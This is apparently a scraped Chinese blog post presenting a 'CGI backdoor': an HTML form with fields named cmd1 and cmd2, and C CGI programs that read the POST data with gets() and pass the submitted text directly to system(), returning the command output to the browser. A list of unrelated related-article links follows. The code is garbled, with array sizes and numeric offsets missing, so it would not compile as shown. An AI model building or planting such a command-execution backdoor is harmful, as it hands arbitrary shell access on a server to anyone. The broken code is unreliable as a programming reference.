1.html代码

<form id = "form" name="form" method="post" action="../cgi-bin/Hello.cgi">

<p></p>

<input type="text" name="cmd1" id="user" value= "用户名"/>

<p></p>

<input type="text" name="cmd2" id="pass" value= "密码"/>

<p></p>

<input type="submit" name="go" id= "Hello" value="进入">

</form>

2.C代码

#define  _CRT_SECURE_NO_WARNINGS

#include<stdio.h>

#include<stdlib.h>

#include<time.h>

//..上一层目录

//"cmd1=123&cmd2=456&go=%BD%F8%C8%EB"

void main123()

{

    printf("Content-type:text/html\n\n");//换行

    char szpost[] = {  };

    gets(szpost);

    printf("%s", szpost);

    char*p1 = strchr(szpost, '&');

    if (*p1 != NULL)

    {

        *p1 = '\0';

    }

    printf("<br>%s", szpost + );

    char *p2 = strchr(p1 + , '&');

    if (*p2!=NULL)

    {

        *p2 = '\0';

    }

    printf("<br>%s", p1+);

    //system(szpost + 5);

    char cmd[] = {  };

    time_t ts;

    unsigned data = time(&ts);

    srand(&ts);

    int num = rand();

    sprintf(cmd, "%s %s >%d.txt", szpost + , p1 + , num);

    char filename[] = {  };

    sprintf(filename, "%d.txt", num);

    system(cmd);

    FILE *pf = fopen(filename, "r");

    while (!feof(pf))

    {

        char ch = fgetc(pf);

        if (ch == '\n')

        {

            printf("<br>");

        }

        else

        {

            putchar(ch);

        }

    }

    fclose(pf);

}

void main3()

{

    printf("Content-type:text/html\n\n");//换行

    char szpost[] = {  };

    gets(szpost);

    printf("%s", szpost);

    char*p1 = strchr(szpost, '&');

    if (*p1!=NULL)

    {

        *p1 = '\0';

    }

    printf("<br>%s", szpost + );

    //system(szpost + 5);

    char cmd[] = {  };

    time_t ts;

    unsigned data = time(&ts);

    srand(&ts);

    int num = rand();

    sprintf(cmd, "%s >%d.txt", szpost + ,num);

    char filename[] = {  };

    sprintf(filename,"%d.txt", num);

    system(cmd);

    FILE *pf = fopen(filename, "r");

    while (!feof(pf))

    {

        char ch = fgetc(pf);

        if (ch=='\n')

        {

            printf("<br>");

        }

        else

        {

            putchar(ch);

        }

    }

    fclose(pf);

}

void main2()

{

    printf("Content-type:text/html\n\n");//换行

    char szpost[] = {  };

    gets(szpost);

    printf("%s", szpost);

}

//重定向输出

//输入

void main()

{

    printf("Content-type:text/html\n\n");//换行

    for (int i = ; i < ; i++)

    {

        //printf("锄禾日当午\n");

        printf("锄禾日当午<br>");

    }

}

服务器开发之CGI后门的更多相关文章

  1. 高性能服务器开发之C++定时器

    高性能服务器开发之C++定时器 来源: https://www.cnblogs.com/junye/p/5836552.html 写这篇文章前搜了下网上类似的文章,有很多,所以笔者的这篇文章就不对定时 ...

  2. JSON的服务器开发之路

    JSON的服务器开发之路 不知道需要哪儿些包... /dcywpt/WebRoot/WEB-INF/lib/commons-collections-3.2.jar /dcywpt/WebRoot/WE ...

  3. C语言进行站点开发之cgi

     安装Apach 配置ApacheRuntime 以下的过程中一直点击next 配置CGI,放开配置:AddHandler cgi-script .cgi watermark/2/text/aHR ...

  4. JavaEE开发之SpringMVC中的静态资源映射及服务器推送技术

    在上篇博客中,我们聊了<JavaEE开发之SpringMVC中的自定义拦截器及异常处理>.本篇博客我们继续的来聊SpringMVC的东西,下方我们将会聊到js.css这些静态文件的加载配置 ...

  5. Android安全开发之WebView中的地雷

    Android安全开发之WebView中的地雷 0X01 About WebView 在Android开发中,经常会使用WebView来实现WEB页面的展示,在Activiry中启动自己的浏览器,或者 ...

  6. 微信公众号开发之VS远程调试

    目录 (一)微信公众号开发之VS远程调试 (二)微信公众号开发之基础梳理 (三)微信公众号开发之自动消息回复和自定义菜单 前言 微信公众平台消息接口的工作原理大概可以这样理解:从用户端到公众号端一个流 ...

  7. Android安全开发之ZIP文件目录遍历

    1.ZIP文件目录遍历简介 因为ZIP压缩包文件中允许存在“../”的字符串,攻击者可以利用多个“../”在解压时改变ZIP包中某个文件的存放位置,覆盖掉应用原有的文件.如果被覆盖掉的文件是动态链接s ...

  8. Cocos2d-x 3.x游戏开发之旅

    Cocos2d-x 3.x游戏开发之旅 钟迪龙 著   ISBN 978-7-121-24276-2 2014年10月出版 定价:79.00元 516页 16开 内容提要 <Cocos2d-x ...

  9. iOS开发之Socket通信实战--Request请求数据包编码模块

    实际上在iOS很多应用开发中,大部分用的网络通信都是http/https协议,除非有特殊的需求会用到Socket网络协议进行网络数 据传输,这时候在iOS客户端就需要很好的第三方CocoaAsyncS ...

随机推荐

  1. I2C通讯协议

    1.基本概念 主机            初始化发送,产生时钟信号和终止发送的器件 从机             被主机寻址的器件  发送器          发送数据到总线的器件 接收器       ...

  2. ISE14.7兼容性问题集锦

    六.WARNING:iMPACT:923 - Can not find cable, check cable setup ! 这个错误是由于驱动没有安装或者驱动安装有问题,一般ISE会在安装的时候把驱 ...

  3. git向码云上传代码总结

    1.下载git windows下载地址:https://git-for-windows.github.io/ 2.安装git 一路确定 3.配置git 如果你要使用ssh上传代码,你需要本地生成ssh ...

  4. npm 简单实用命令

    npm -v    查看版本号 npm get global             返回false表示默认本地安装 true全局安装 npm set global=true     设置默认为全局安 ...

  5. sublime 设置新建文件自动添加author(作者)等文件头信息

    很多时候, sublime 自带自动添加文件头信息, 但是并不是我们想要比如下面这样的:新建一个python文件 自动添加的author 信息== 上面并不是我想要的, 我想要下面这样的效果:== 这 ...

  6. HDU2825 Wireless Password

    Description Liyuan lives in a old apartment. One day, he suddenly found that there was a wireless ne ...

  7. 并查集-HDU1232-畅通工程

    转的其他人的.不知道谁的. 来看一个实例,杭电1232畅通工程 首先在地图上给你若干个城镇,这些城镇都可以看作点,然后告诉你哪些对城镇之间是有道路直接相连的.最后要解决的是整幅图的连通性问题.比如随意 ...

  8. 自写 zTree搜索功能 -- 关键字查询 -- 递归无限层

    唠叨一哈 前两天朋友跟我说要一个ztree的搜索功能,我劈头就是一巴掌:这种方法难道无数前辈还做少了?自己去找,我很忙~然后我默默地蹲着写zTree的搜索方法去了.为什么呢?因为我说了句“找不到是不可 ...

  9. Document类型知识大全

    Document类型 1.文档的子节点  Document类型可以表示HTML页面或者其他基于XML的文档.不过,最常见的应用还是作为HTMLDocument实例的document对象.通过这个文档对 ...

  10. PageRank_网页排名_MapReduceJava代码实现思路

    PageRank 1.    概念 2.    原理   3.    java代码实现思路   1.定义收敛标准     每次算出新的pr-oldpr=差值 ,所有页面的差值累加 ,除以pagecou ...